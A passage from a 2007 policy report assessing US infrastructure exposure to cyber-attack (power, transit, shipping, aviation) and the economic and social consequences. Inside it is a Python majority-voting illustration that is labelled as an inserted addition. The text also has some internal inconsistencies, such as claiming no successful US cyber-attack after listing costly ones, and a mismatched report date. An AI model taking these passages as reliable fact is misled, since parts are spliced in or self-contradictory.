In 2000, the Electric Power Research Institute developed the Energy Information Security (EIS) program to provide individual utilities with tools to enhance their own security programs, including cyber-security awareness training, information sharing and risk management protocols. The program has led to early exploratory work on fast encryption technologies to protect data and control systems.[142] However, as Clarke points out, tools like those EIS provided for the utilities’ systems were too difficult to install, took too long to install, or introduced an incompatibility that created another problem.[143] As a result, the EIS program has not led to any significant improvement in cyber-security other than the fast encryption research.

Another attempt at utility cyber-security came in 2004, when the Department of Homeland Security established the Process Control Systems Forum (PCSF). The Forum focuses on “threats to the computerized automated control systems that underlie operation of most of the country’s critical infrastructure, including the electric power grid.”[144] In other words, the Forum gathers security knowledge obtained in different infrastructure fields and tries to stimulate communication among utility companies in order to increase the nation’s infrastructure security.

Although these programs have produced some positive results, the ever-growing power grid and the constantly improving techniques and knowledge of terrorists call for a larger, more comprehensive approach to the cyber-security dilemma. After gathering security information from over 60 utilities and government organizations, the PowerSec Initiative was formed to map the strengths and weaknesses of the power system. From the information gathered so far and still being gathered, PowerSec is able to “evaluate the industry’s current cyber-attack readiness, identify gaps in this readiness, and specify existing best practices for filling these gaps.”[145] Through this program, the power utility industry should eventually know exactly what does and does not work in protecting its systems.

3.3.2 Emergency Response

“Eligible Receiver” remains the only recorded instance in America of a 911 system being taken over, and that was a sanctioned exercise. In Estonia, the emergency response system was shut down for about an hour during the 2007 denial-of-service attacks on the Baltic country, which have been widely attributed to Russia. We found no published research in this area.

142. Shainker, op. cit., 35-6.
143. Interview with Richard Clarke, op. cit. (note 136).
144. Shainker, op. cit., 34.
145. Shainker, op. cit., 36.

3.3.3 Communications

Although no loss of communications systems has been recorded in America, Homeland Security and Defense telecommunications spending will increase from $15.2 billion in 2004 to $21 billion by 2009 in order to expand the network in case of cyber-attack.[146] Estonia lost most of its international communications for a few days during the 2007 DoS attacks attributed to Russia. We found no published research in this area.

3.4 Transportation Systems as a Target

According to Joseph Szyliowicz, a member of the Transportation Research Board, “cyber

warfare is of direct relevance to transportation, given the ever-growing dependence on modern

information, tracking, and data processing systems by transportation companies and agencies.”

147

Transportation systems could conceivably be an appealing target to potential cyber-attackers due to the integral role they play in the economy. Szyliowicz notes that transportation accounts for over 10 percent of the nation’s gross domestic product. The recent history of conventional terrorism also suggests that cyber-attackers may choose to target transportation systems, provided feasible opportunities exist. Eighteen of the twenty-five major terrorist attacks from 1983 to 2001 “involved the use of transportation vehicles as weapons, and another five involved attacks on planes.”148

At present, the aviation system is more at risk of a focused cyber-attack than any other component of the nation’s transportation infrastructure. Other transportation networks, such as urban public transit systems, rely less on computer systems to function. Ports and shipping networks may be open to certain cyber-attacks with limited scope, but these vulnerabilities seem to pale in comparison to physical vulnerabilities, and cyber-attacks on these networks have been the subject of relatively little research. Following a discussion of public transit systems and shipping networks, this assessment focuses on aviation systems as a target of cyber-attacks.

146 “Homeland Security and Defense Telecommunications Spending to Increase 40 Percent by 2009.” Business Wire. 3 August 2004. 28 Oct. 2007. <http://findarticles.com/p/articles/mi_m0EIN/is_2004_August_3/ai_n6139915>

147 Szyliowicz, Joseph S. (2004). International transportation security. Review of Policy Research. 21

148 Ibid


3.4.1 Public Transit Systems

Public transit systems, such as buses, metros, light rail, and ferries, do not appear to be a likely target of cyber-attacks. They are generally manually controlled, and can be operated independently of any centralized computer systems or the Internet.

[Figure 3.1: Worldwide Terrorist Attacks on Public Transit, 1980-2005 (chart; attack categories: Ambushes, Hijackings, Misc., Shootings, Bombs, Other explosives (e.g. grenades, rockets and landmines))]

There were 235 attempted terrorist attacks on public transit systems around the world from 1980 to 2005, but none of those attempts used electronic methods of attack or targeted any computer systems.149 Their main vulnerability to cyber-attacks stems from their use of communications and power systems; both of those systems were discussed previously in this report.

3.4.2 Shipping Networks

To date, studies of the risk of cyber-attacks on ports and domestic freight and shipping networks have been mostly speculative. It appears the threat cyber-attacks currently pose to shipping networks is small compared to other areas of the transportation infrastructure. As with other areas of the national infrastructure, shipping networks will become more vulnerable to cyber-attacks as they rely more on computer systems.

According to a 2003 Transportation Research Board report, the nation’s shipping infrastructure is a fragmented patchwork of private companies “operating different modes of transport (e.g.,

149 Pike, J. (2007, July 7). Chronology of terrorist attacks against public transit. Retrieved October 30, 2007, from Global Security Web site: http://www.globalsecurity.org/security/ops/mass-transit-chron.htm



ship, truck, train, air)” with a small degree of overall system coordination and varying local, state and federal regulations.150 A breakdown of the industry by transportation mode is shown below.

Figure 3.2: Value and Tonnage of Domestic Freight Shipments151

The freight industry’s current use of computer systems is largely focused on replacing paper manifest documents with electronic versions. In the maritime and air shipping sectors, freight carriers are now allowed the option of submitting manifests electronically to reduce their cargo’s processing time. Participation in a similar system was made mandatory in January, 2007 for truck carriers entering the country; carriers can enter information through the Internet or electronic data interchange (EDI).152

This could potentially introduce the ability of cyber-attackers to gain access to shipping manifests, but no easily obtainable data exists to suggest that this is viable. The risk is mitigated by the fact that in a regime of voluntary participation, as is the case with maritime and air shipping, carriers often opt to use traditional paper manifests. In the case of the trucking industry, for example, only 4 to 9 percent of incoming trucks filed electronic manifests before participation was made mandatory. In the trucking industry in particular, changes to the type of cargo and the carrier’s route are frequent.153

In the future, one source of vulnerability could result from the use of electronic container tags and seals. Electronic tags would store information on a container’s contents, while electronic seals would signal whether a container had been opened or tampered with. These technologies

150 Transportation Research Board. (2003). Cybersecurity of freight information systems: A scoping study. Washington, D.C.: Transportation Research Board.

151 Transportation Research Board. (2003). Cybersecurity of freight information systems: A scoping study. Washington, D.C.: Transportation Research Board.

152 Moore, J. (2007 February 26). Freight security programs and test projects proliferate. FCW.com. Retrieved October 25, 2007, from http://www.fcw.com/print/13_5/news/97727-1.html

153 Moore, J. (2007 February 26). A long haul for freight security. FCW.com. Retrieved October 25, 2007, from http://www.fcw.com/print/13_5/news/97727-1.html


are in the planning phases,154 so it isn’t clear exactly how viable it would be to exploit these electronic devices.

The most substantial cyber-security assessment of the shipping network is found in the 2003 Transportation Research Board report discussed above.155 That report outlined three possible cyber-attack scenarios.

The first scenario involved a denial-of-service attack on freight information systems, such as those used by customs agencies. However, the fragmented nature of the freight industry may help reduce the damage of a denial-of-service attack. The Transportation Research Board concluded that more research needs to be done, but these attacks would likely be “easiest to perpetrate but the least damaging.”

The two other scenarios do not involve pure cyber-attacks, but rather the use of cyber-attacks to strengthen a conventional attack. Attackers could conceivably use electronic manifest information to intercept a hazardous materials shipment, or plant false manifest information to disguise a shipment of weapons or hazardous materials. The Transportation Research Board concluded the latter case “may be the least likely, and the IT role in the attack may not be central.” Because these technologies are largely in the test phase, there are no case studies or assessments of the feasibility of this scenario.

3.4.3 Air Transportation Networks

At present, the aviation system uses computer technologies more heavily than any other component of the nation’s transportation infrastructure. The Federal Aviation Administration’s air traffic control system has been described by the Government Accountability Office as “a vast network of computer hardware, software, and communications equipment.”156

The FAA estimates that the air transportation industry accounts for 5.4 percent of the nation’s GDP. On an average day, nearly 2 million passengers fly in U.S. airspace, and up to 7,000 civilian and military aircraft are aloft over the U.S. at any given time.157 Only one would need to be targeted in a cyber-attack for an impact to be felt on the economy and public perception, even if the attack did not result in physical damage.

154 Transportation Research Board. (2003). Cybersecurity of freight information systems: A scoping study. Washington, D.C.: Transportation Research Board.

155 Transportation Research Board. (2003). Cybersecurity of freight information systems: A scoping study. Washington, D.C.: Transportation Research Board.

156 Government Accountability Office. (2003). Information security: Progress made, but Federal Aviation Administration needs to improve controls over air traffic systems. Washington, D.C.: Government Accountability Office.

157 FAA Air Traffic Organization. (2006). Moving America safely: 2005 annual performance report. Washington, D.C.: Federal Aviation Administration.


Figure 3.3: FAA Traffic Situation Display of Civilian and Military Aircraft158

3.4.3.1 Aircraft Internal Electronic Control Systems

One potentially serious, but largely unrealistic vulnerability to cyber-attack is introduced by the reliance of commercial aircraft on electronic flight control systems. Many newer commercial aircraft use electronic fly-by-wire (FBW) control systems, including, as of 2001, 2,300 out of 11,000 aircraft made by Boeing and Airbus, the two most popular manufacturers.159 In these FBW systems, the cockpit is connected to the plane’s wing and tail control mechanisms by solid state electrical control systems instead of by direct mechanical or hydraulic connections. In some planes, such as the Boeing 777 and the Airbus A380, there is no hydraulic or mechanical backup control system, and the pilot cannot completely disable the plane’s computers and bypass the FBW system.160

However, in commercial FBW aircraft, the pilot can still disable automatic navigation systems and manually input flight instructions to the FBW system. This implies there is no way for a commercial aircraft to be electronically hijacked while it is airborne. Systems allowing authorities to remotely control a commercial aircraft in an emergency have been conceived, but industry leaders have concluded these systems would introduce more vulnerabilities than the

158 Government Accountability Office. (2003). Information security: Progress made, but Federal Aviation Administration needs to improve controls over air traffic systems. Washington, D.C.: Government Accountability Office.

159 Wald, M. L. (2002, April 11). Can Computers Foil Air Pirates? New York Times.

160 Alford, L. (2000). Cyber warfare: Protecting military systems. Acquisition Review Quarterly, Spring 2000 volume.


benefit would warrant.161 Also, in 1993, one study concluded that fears of electromagnetic radiation disrupting an aircraft’s electrical control system were “unfounded.”162

The vulnerability of the FBW system’s software to the insertion of malicious code is another conceivable risk factor, but the system’s built-in redundancies make this impractical for a cyber-attacker to exploit. Airbus uses a software-based approach, in which several teams of software developers develop unique implementations of the FBW software from a common set of specifications. The multiple implementations are run in parallel in the final design, and a voting system is used to choose the most recommended output.163 This means any attempt to insert malicious code into an Airbus flight control system from the inside would require “renegade” software developers to be on a majority of the development teams.

Boeing’s 777 uses a hardware-based approach instead in its “triple-triple redundant” FBW system, largely similar to that of the newer 787. There are three independent, isolated flight computer channels, and each channel has three independently-powered “computer lanes” with three dissimilar microprocessors. Among other things, this means the software code is compiled in three different ways; according to the system’s design specifications, this dissimilar redundancy should reduce the risk of hardware being compromised by a factor of one million.164
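The voting arrangement behind both the Airbus (software-diverse) and Boeing (triple-triple) designs above is N-version majority voting. The following is an added illustration, not code from this report or from either manufacturer: three independently written versions of one constructed toy specification (scale a stick deflection into an elevator command and clamp it; the gain and limit are assumptions) run on the same input, and a voter releases only the value a strict majority agrees on. A deliberately wrong version stands in for a faulty or tampered lane, and a two-level vote models the channel-then-lane layout. The example generalises beyond the text's three-way case to any number of versions and channels.

```python
"""N-version majority voting, as used in dissimilar-redundancy flight control.

Added illustration (not Airbus or Boeing code): several independently written
implementations of one specification run on the same input, and a voter passes
only the value a majority agrees on, so a single faulty or tampered version is
outvoted and reported instead of reaching the actuator.
"""
from dataclasses import dataclass, field
from typing import Callable, List, Optional, Sequence

# Constructed toy specification: scale a pitch-stick deflection (degrees) into
# an elevator command, clamped to +/-25 degrees. Both numbers are assumptions.
GAIN = 2.5
LIMIT = 25.0


def impl_a(stick: float) -> float:
    """Version A: clamp with min/max."""
    return max(-LIMIT, min(LIMIT, GAIN * stick))


def impl_b(stick: float) -> float:
    """Version B: same spec, written as explicit branches."""
    cmd = stick * GAIN
    if cmd > LIMIT:
        cmd = LIMIT
    elif cmd < -LIMIT:
        cmd = -LIMIT
    return cmd


def impl_c(stick: float) -> float:
    """Version C: same spec, clamp via the median of three values."""
    return float(sorted((-LIMIT, GAIN * stick, LIMIT))[1])


def rogue(stick: float) -> float:
    """Stand-in for one faulty or maliciously altered version: sign inverted."""
    return -impl_a(stick)


@dataclass
class VoteResult:
    output: Optional[float]          # None when no strict majority exists
    agreeing: int                    # size of the largest agreeing group
    dissenting: List[int] = field(default_factory=list)  # lane indices that disagree


def majority_vote(outputs: Sequence[Optional[float]], tol: float = 1e-6) -> VoteResult:
    """Return the value shared by a strict majority of outputs, or None.

    Values within `tol` of each other count as agreeing; a None entry (a lane
    that produced nothing) never agrees with anything.
    """
    n = len(outputs)
    best_idx, best_count = None, 0
    for i, x in enumerate(outputs):
        if x is None:
            continue
        count = sum(1 for y in outputs if y is not None and abs(x - y) <= tol)
        if count > best_count:
            best_idx, best_count = i, count
    if best_idx is None or 2 * best_count <= n:
        # No strict majority: fail safe by releasing nothing and flagging all lanes.
        return VoteResult(None, best_count, list(range(n)))
    value = outputs[best_idx]
    dissenting = [j for j, y in enumerate(outputs)
                  if y is None or abs(value - y) > tol]
    return VoteResult(value, best_count, dissenting)


Version = Callable[[float], float]


def channel_output(stick: float, lanes: Sequence[Version]) -> VoteResult:
    """One channel: run every lane's version and vote across the lanes."""
    return majority_vote([lane(stick) for lane in lanes])


def triple_triple(stick: float, channels: Sequence[Sequence[Version]]) -> VoteResult:
    """Two-level vote modelled on a 'triple-triple' layout: each channel votes
    across its own lanes, then the channels' results are voted again."""
    per_channel = [channel_output(stick, lanes).output for lanes in channels]
    return majority_vote(per_channel)


if __name__ == "__main__":
    healthy = [impl_a, impl_b, impl_c]
    print(majority_vote([f(4.0) for f in healthy]))               # 10.0, no dissent
    print(majority_vote([impl_a(4.0), rogue(4.0), impl_c(4.0)]))  # 10.0, lane 1 dissents
    # A whole channel taken over is still outvoted by the other two channels.
    print(triple_triple(4.0, [healthy, healthy, [rogue, rogue, rogue]]))
```

The `dissenting` list is the defender's signal: a lane that keeps losing votes is either failing or has been altered, and that is what maintenance or a security review should act on. The "renegade majority" argument in the text follows directly from the strict-majority rule in `majority_vote`: altering one version, or even one whole channel, changes nothing that reaches the output.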

It is conceivable that as future aircraft rely more heavily on computer systems, they may become more vulnerable to cyber-attacks. At present, though, disrupting or hijacking a commercial aircraft’s navigation system is infeasible to the extent that the risk of a cyber-attack to an aircraft’s computer system is far outweighed by the risk of conventional attacks. Cyber-attackers are likely to look elsewhere for a more practical target.

3.4.3.2 Air Traffic Control System

The nationwide air traffic control system is more exposed to cyber-attack than individual aircraft are, and is accordingly a more realistic target. The most recent Government Accountability Office report on the FAA’s cyber-security, published in 2005, found that despite ongoing efforts to improve information security, the agency’s computer systems were “vulnerable to unauthorized access, use, modification, and destruction that could disrupt aviation operations.”165

161 Wald, M. L. (2002, April 11). Can Computers Foil Air Pirates? New York Times.

162 Clough, B.T., Cope, B., & Donley, S. (1993). Microwave induced upset of digital flight control systems. Digital Avionics Systems Conference. 12, 179-184.

163 Greenwell, W.S. and J.G. Alsbrooks (2007). Excerpt From "Digital Control Systems". Retrieved November 3, 2007, from IEEE Computer Society Web site: http://www.computer.org/portal/site/ieeecs/menuitem.c5efb9b8ade9096b8a9ca0108bcd45f3/index.jsp?&pName=ieeecs_level1&path=ieeecs/ReadyNotes&file=s_k_sample.xml&xsl=generic.xsl&

164 Yeh, Y.C. (2001). Safety critical avionics for the 777 primary flight controls system. Digital Avionics Systems. 1, 1-11.

165 Government Accountability Office. (2003). Information security: Progress made, but Federal Aviation Administration needs to improve controls over air traffic systems. Washington, D.C.: Government Accountability Office.


Some vulnerabilities found by the GAO were a result of outdated or poorly configured computers. In one case, a computer system’s operating system had been unpatched since 1991 despite several vulnerabilities; in many other cases patches were not applied consistently or quickly enough. Networks were not configured to prevent intrusion or denial-of-service attacks—though a fix was in progress at the time of the report—and intrusions were not traceable to a specific user or location.

Other problems found by the GAO were related to the staffing policies of the FAA and user access permissions. For example, the FAA relies on outside contractors for much of its information technology, and access to sensitive areas of the computer systems was often granted when it wasn’t necessary for a worker to perform their job. There was little segregation between software development, testing, and production control—another issue the FAA had plans to fix—meaning developers could introduce malicious code.

However, while vulnerabilities to intrusion and malicious code exist, the same report stated that the nature of the FAA’s computer systems makes them somewhat less susceptible to a cyber-attack. The systems are highly proprietary and out-of-date relative to typical computer systems, meaning they are more vulnerable to an attack from within the agency than from an outsider or from the average hacker.

While the FAA does, as the GAO report states, rely on computer systems to ensure “safe, orderly and efficient” air transportation, it isn’t clear that any physical damage would result from cyber-attacks on air traffic systems. According to the Center for Strategic & International Studies, if computer networks are unavailable, backup communications equipment exists which isn’t dependent on the Internet, and air traffic’s “control and decision making process” includes a “high level of human involvement” that reduces the potential damage of a cyber-attack. Furthermore, pilots are trained to operate aircraft without support from air traffic control in emergency situations166 and modern commercial aircraft include automatic collision avoidance systems.

Case studies help reveal the realistic impact that would result from a cyber-attack on aviation systems. In 1997, a juvenile hacker disabled the local phone service in Rutland, Massachusetts, resulting in the disabling of the air traffic control tower’s main radio transmitter at Worcester Regional Airport for six hours.167 No accidents, close calls or disruptions were reported at the airport, which handled an average of about 165 flights per day that year, but this demonstrates how vulnerable systems have been in the past.

In September of 2004, the FAA servers that allowed air traffic controllers in Southern California to communicate with the 800 airplanes aloft in their airspace crashed for three hours. Planes that had not taken off were held on the ground and delayed or cancelled.168 Air traffic controllers affected by the server crash used their cell phones to pass control of the airborne planes to other

166 Lewis, J. (2002). Assessing the risks of cyber terrorism, cyber war and other cyber threats. Washington, D.C.: Center for Strategic & International Studies.

167 Thomas, Pierre (1998). Teen hacker faces federal charges. Retrieved October 25, 2007, from CNN.com Web site: http://www.cnn.com/TECH/computing/9803/18/juvenile.hacker/index.html

168 Wald, M.L. (2004, September 15). Air control failure disrupts traffic. New York Times.


FAA facilities. There were no accidents, but there were five incidents of planes traveling more closely than normal; in the closest call, two planes were separated horizontally by one mile.169 This demonstrates that while temporary disruptions to air traffic control do not overwhelmingly increase the risk of an accident, the risk is still greater than during normal operation.

A similar incident happened at the FAA’s Memphis Control Center in September of 2007, when radar and phone communication were lost for two hours. Again, when their capability to communicate directly with aircraft was lost, air traffic controllers handed control of the planes in their 100,000 square miles of airspace to seven adjacent control centers via cell phone. No accidents or close calls resulted. There were many delayed flights, but few cancellations; out of 740 flights that day, Northwest Airlines cancelled 13 and diverted 19.

One possible cyber-attack scenario would involve the insertion of malicious code into FAA software, either by a renegade FAA employee or contractor or by remotely accessing FAA servers. There is not much available research into what the worst-case effects of this could be—possibly for national security reasons—but it is conceivable that the air traffic control system could be disabled. Another possible cyber-attack could target communication systems such as local phone systems or power systems that air traffic control centers rely on.

The effects of these kinds of attack would be similar to those of the case studies previously discussed. The affected areas of the national air traffic system would put a hold on departing flights, and the flights in the air would most likely be managed by air traffic control centers that were still operational. Any delays and cancellations would have economic consequences in proportion to the duration and scope of the shutdown, and public confidence could erode in any scenario. The worst case scenario, in which all air traffic control centers would be disabled for an extended period of time, is purely speculative and highly unlikely, given the distributed and redundant nature of the air traffic system.

It is also conceivable that a cyber-attack could be used to disable some component of the air traffic control system in conjunction with a more traditional form of attack. For example, if every FAA control center were disabled while a plane was hijacked, it is conceivable that more damage could result. While this sort of total collapse of the FAA’s control network would be completely without precedent and is purely speculative, it is not known to be impossible. However, these combined cyber and traditional attacks on aviation are the subject of little research, and it is unclear how much of a negative effect the system being disabled would realistically add to the conventional attack.

3.4.4 Conclusions

In all areas of the nation’s transportation infrastructure, the threat currently posed by cyber-warfare is significantly smaller than that posed by conventional methods of attack. Public transit systems are currently not reliant on computer systems enough to be an attractive target to cyber-attackers. Similarly, shipping networks’ vulnerability to cyber-attacks is limited at present, and

169 Mullen, M. (2004, September 16). Human error caused chaos in the sky. Retrieved October 25, 2007, from MSNBC Online Web site: http://www.msnbc.msn.com/id/6021929/


any cyber-attack on shipping networks would need to occur in conjunction with a conventional attack to cause major damage. Also, there are enough glaring physical vulnerabilities that attackers would be less likely to focus cyber-warfare on shipping networks.

In the case of the nation’s aviation network, the air traffic control system has several major vulnerabilities to cyber-attacks that should be addressed, as demonstrated by previous incidents. However, because of the degree of redundancy and human involvement present, the potential physical damage caused by cyber-attacks is unlikely to approach the damage conventional attacks can cause. This makes cyber-warfare a less favorable tool for aggressors, especially if not used in conjunction with some form of traditional attack.

At present, the primary effects of a cyber-attack on the transportation infrastructure would be economic, not physical. However, as systems become more dependent on computer systems, they will be inherently more vulnerable to cyber-attacks, and the effects may become more severe. This means cyber-security should remain central to the development of transportation systems.


4 Consequences


4.1 Economic Consequences of Cyber-Warfare

It is difficult to quantify the economic effects of cyber-warfare because the scale of such attacks varies widely. Assumptions must be made on the degree of success of attacks and their consequences must then be analyzed. Previous attacks and electronic disruptions provide insight on potential costs.

4.1.1 Economic Consequences of Hacking

Cyber-warfare incidents can be costly even when conducted by small groups of attackers. A group of 12 people led by Jonathan Bosanac from San Diego “hacked into a digital cache of unpublished telephone numbers at the White House, portions of the national power grid, air traffic control systems, the FBI’s National Crime Information Center, credit-reporting databases, and telephone networks such as MCI, WorldCom, Sprint, and AT&T.” These 12 attackers cost the United States and businesses an estimated $1.85 million.170

In 1999, a computer hacker from New Jersey created a virus called “Melissa” that spread through thousands of computers through email. The virus attacked personal, government and corporate computers using an “X-rated Web site.” This computer virus alone, created by one man, caused an estimated $80 million in damage.171 A virus called “I Love You”, created in 2000, caused $10 billion in damage. When “Love-Letter-For-You.txt.vbs” was opened from a recipient’s email, the virus would copy itself onto three locations in the computer, initiating various start-up commands upon computer boot-up, and sending itself as an attachment to addresses in the recipient’s address book.172 This virus was created by a single student in the Philippines whose PhD thesis had been rejected.

4.1.2 Economic Consequences of Infrastructure Attacks

There are many critical infrastructures that could be attacked and result in economic damage, but there are two sectors that are more significant individual threats.

The transportation system is an appealing target to potential cyber-attackers due to the integral role it plays in the economy. Transportation accounts for over 10 percent of the nation’s gross domestic product. The recent history of conventional terrorism also suggests that cyber-attackers may choose to target transportation systems, provided feasible opportunities exist. Eighteen of the twenty-five major terrorist attacks from 1983 to 2001 “involved the use of transportation vehicles as weapons, and another five involved attacks on planes.”173

170 Granville, J. Dot.Con: The Dangers of Cyber Crime and a Call for Proactive Solutions. Australian Journal of Politics & History. March, 2003, Vol. 49 Issue 1. Pg. 104

171 Ibid

172 Ibid

173 Szyliowicz, Joseph S. (2004). International transportation security. Review of Policy Research. 21


The FAA estimates that the air transportation industry accounts for 5.4 percent of the nation’s GDP. On an average day, nearly 2 million passengers fly in U.S. airspace, and up to 7,000 civilian and military aircraft are aloft over the U.S. at any given time.174 Only one would need to be targeted in a cyber-attack for an impact to be felt on the economy and public perception, even if the attack did not result in physical damage.

A successful attack on the power grid presents the greatest economic threat among critical infrastructures. An Independent Task Force under the Council on Foreign Relations describes in a report how vulnerable the power grid really is. Refined oil would be a likely target, as “A coordinated attack on several key pumping stations - most of which are in remote areas, are not staffed, and possess no intrusion-detection devices - could cause mass disruption to these flows. Nearly 50 percent of California’s electrical supply comes from natural gas power plants, and 30 percent of California’s natural gas comes from Canada. Compressor stations to maintain pressure cost up to $40 million each and are located every sixty miles on a pipeline. If these compressor stations were targeted, the pipeline would be shut down for an extended period of time. A coordinated attack on a selected set of key points in the electrical power system could result in multi-state blackouts. While power might be restored in parts of the region within a matter of days or weeks, acute shortages could mandate rolling blackouts for as long as several years.”175 Even with a new advanced backup power source installed in December of 2006, the system is only expected to last for 4 months.176

The cost of power outages alone is tremendous, not to mention the effects on public confidence and on critical infrastructures. “The average cost of a one-second outage among industrial and DE firms is $1,477, vs. an average [per second] cost of $2,107 for a three minute outage and $7,795 for a one-hour outage.”177 These figures demonstrate that the average cost per second increases as the duration of the power outage increases. The New York power outage that lasted only one day cost the United States an estimated $6 Billion.178 An extended outage for one company alone could cost approximately $5 million per month. Considering that there are thousands of distributed energy firms in any given region of the U.S., these figures could approach one trillion dollars per month. An impact this big on the U.S. economy would affect almost every citizen in the country.

174 FAA Air Traffic Organization. (2006). Moving America safely: 2005 annual performance report. Washington, D.C.: Federal Aviation Administration.

175 http://www.cfr.org/content/publications/attachments/Homeland_TF.pdf

176 http://www.buyerzone.com/facilities/generators/rbic-taking-stock.html

177 Lineweber, David and Shawn McNulty (2001). “The Cost of Power Disturbances to Industrial & Digital Economy Companies”. Electric Power Research Institute, Inc. 30 Oct 2007. <http://www.epri-intelligrid.com/intelligrid/docs/Cost_of_Power_Disturbances_to_Industrial_and_Digital_Technology_Companies.pdf>

178 “An Analysis of the Consequences of the August 14th 2003 Power Outage and its Potential Impact on Business Strategy and Local Public Policy”. 2004. <http://www.acp-international.com/southtx/docs/ne2003.pdf>


4.1.3 Economic Consequence of Combined Attacks

Even more costly than an attack on the power grid would be a coordinated attack on multiple systems. The various sectors of the current critical infrastructures in the U.S. are extremely co-dependent. Oil refineries, power plants, dams, water treatment plants, security operations, and many other infrastructures all depend on the internet and a constant electric power source. The loss of these interconnected systems could cascade and result in immense economic consequences. In November, 2004, a project conducted by the Department of Energy with the code name “Black Ice” revealed the interdependencies between critical infrastructures. The exercise showed how an ice storm that knocks out a major portion of the power grid would first disrupt telecommunications systems, and later water supply, natural gas supply, and even emergency response systems.179

When one considers the possibilities of organizational attacks and the compounding effect of the loss of public confidence, the potential economic impact rises dramatically. This loss of confidence would be the exact target of a terrorist organization. Terrorists aim “to create fear by causing confusion and uncertainty within a given population… (Terrorist organizations) generally use symbolic means to attack the sanctity of the society… Such actions result in confusion and uncertainty about a government’s ability to protect its citizens. This is when citizens are most vulnerable to influence by others.” Not only could they receive media attention for their efforts, the terrorists would also succeed in degrading the economic system as the population lost confidence in the market of such a vulnerable nation.180 If there were a coordinated attack on a combination of systems in a large region, the estimated economic impacts approach two trillion dollars.

179 Verton, Dan. Utah’s ‘Black Ice’: Cyber-attack scenario. October 21, 2001. http://archives.cnn.com/2001/TECH/ptech/10/21/black.ice.idg/index.html

180 “National Infrastructure Protection Center Highlights”. National Infrastructure Protection Agency. 15 June 2001, p. 2. 30 Oct 2007 <http://www.iwar.org.uk/infocon/nipc-highlights/2002/highlight02-03.pdf>

Figure 4.1


4.2 Social Effects

The negative effects of cyber-attacks extend far beyond damage to the economy, particularly in the case of cyber-terrorism. Currently, no one has ever launched a successful cyber-attack on the United States, so the social effects of such an attack are purely speculative. Because the Bush administration categorizes cyber-attacks along with chemical, biological, nuclear, and other major attacks, the only attacks large enough to serve as a point of comparison are the September 11th World Trade Center attacks. However, because the effects of a cyber-attack could vary greatly, this comparison is tenuous at best: the public’s reaction could differ greatly between a cyber-attack that causes widespread erasure of credit card information but causes no direct fatalities, and a cyber-attack that opens a dam’s floodgates and kills thousands. Nevertheless, it is likely that a successful act of cyber-war or cyber-terrorism on the United States would have profound social effects, particularly in terms of public confidence in the government and in the area of infrastructure affected by the attack.

4.2.1 Public Confidence in the Government

There is a great deal of speculation among cyber-security professionals as to whether the United States government is undereducated about the capabilities of cyber-attacks. According to Joe Weiss, a consulting executive for KEMA Inc, this likely stems from ignorance within the information technology industry itself about how well many systems are protected. Weiss claims that materials that have reached Senate and congressional staffers about cyber-security were technically flawed and lacking important basic information; one report about SCADA systems’ threat to infrastructure failed even to identify that the electrical industry uses SCADA systems.181 Many cyber-security industry professionals feel that because of this ignorance in Washington, neither enough attention nor funding is given to measures that could secure our country from cyber-attacks. The public itself is also uneducated about cyber-security: a National Cyber Security Alliance poll from October 2007 shows that of the 87% of computer users who said they use anti-virus software, 48% had not updated their software within a month. Furthermore, 81% of respondents had a firewall installed on their computer, but only 64% actually used the firewall.182 These discrepancies indicate a universal need to increase awareness and education about cyber-warfare and cyber-security in both the public and private sectors.

However, it is not entirely accurate to say that the Bush administration has not taken any action

to improve the nation’s cyber-security. In terms of budgeting, between 2002 and 2004, the

government increased the fiscal year budget federal records protection from $2.7 billion to $4.9

billion, and the National Strategy to Defend Cyberspace laid out a defense plan around which

further budgeting could be based. Despite these budget increases to federal cyber-security,

critics say that the government is still not giving infrastructure enough funding to allow

companies to make the changes outlined in the defense plan183

. Furthermore, polls show that the

181

"Interview: Joseph Weiss." Frontline: Cyber War! 23 Apr. 2003. PBS. 24 Oct. 2007

<http://www.pbs.org/wgbh/pages/frontline/shows/cyberwar/interviews/weiss.html>. 182

"Report Reveals Perception Gap in Cyber Security Awareness." Security Products 2 Oct. 2007. 20 Oct. 2007

<http://www.secprodonline.com/articles/50717/>. 183

"Interview: Richard Clarke." Frontline: Cyber War! 23 Apr. 2003. PBS. 24 Oct. 2007

<http://www.pbs.org/wgbh/pages/frontline/shows/cyberwar/interviews/clarke.html

Page 77: Cyberwarfare Vulnerability Assessment (2007)

77

majority of Americans, both Republican and Democrat, agree that Congress should pass a

“strong data security law184

.”

The public has shown in the aftermath of September 11th that it quickly loses faith in the government if there is evidence that a legitimate threat to national security was ignored. A 2004 poll shows that 49.3% of New York City residents and 41% of New York state citizens believed that the government had foreknowledge of the September 11th attacks [185], in the wake of speculation that the Clinton and Bush administrations ignored warnings of the attacks. This weakening faith in the government is partially reflected in presidential approval ratings, which have fallen steadily since 2001. [186] Industry experts have repeatedly warned the government to bolster cyber-security, even asking for a cyber-security initiative on the scale of the Manhattan Project. [187] While a concrete plan to launch a cyber-war on American interests has not been identified, the public could have a similar response to the government’s failure to heed the experts’ warnings if a cyber-attack large enough to garner national attention were successfully launched.

4.2.2 Public Confidence in Target

Currently, the public seems to have little faith in businesses concerning cyber-attacks: a 2006 Cyber Security Industry Alliance poll found that only 24% of Americans felt that businesses were properly emphasizing protection for information systems and networks. [188] The poll mainly asked about e-commerce, but the security systems used by infrastructure companies are often the same as those used by corporations. Statistics show that, since 2001, increased corporate awareness of cyber-security threats has not led to increased sales of cyber-security products, and most critical infrastructure networks are still unprotected from many types of cyber-attack. [189]

In general, many experts believe that the public is not as concerned about cyber-attacks as about physical attacks because their effects are not as tangible; most people are not aware of the extent to which our society’s infrastructure relies upon computers. Moreover, most cyber-attacks would not be as “flashy” as physical attacks—a cyber-attack on California’s power grid, for example, might have similar effects to the brownouts of 1998, which caused economic distress but not terror or widespread panic. Most experts agree that a large-scale cyber-attack on the United States power grid is the “nightmare scenario,” but some disagree about the feasibility of such an attack. Former White House cyber-security advisor Richard Clarke concedes that it would be possible to bring down the national power grid for a day or two, but says it is “unrealistic” to think that the grid could be taken down for a longer period. On the other hand, Cyber Defense Agency CEO Sami Saydjari claims that a targeted attack requiring about 300 people and $500,000 could be capable of bringing down the national power grid for a month or more. [190]

[184] "Poll Shows Americans Want Congress to Do More to Protect Them Online." Cyber Security Industry Alliance (2006): 30. 21 Oct. 2007 <https://www.csialliance.org/news/pr/view?item_key=e5b543c0cf207bb110c9c65b61ac476ec45e03fe>.
[185] "Poll: 50% of NYC Says U.S. Govt Knew." 30 Aug. 2004. Zogby International Polling/Market Research. 28 Oct. 2007 <http://www.911truth.org/article.php?story=20040830120349841>.
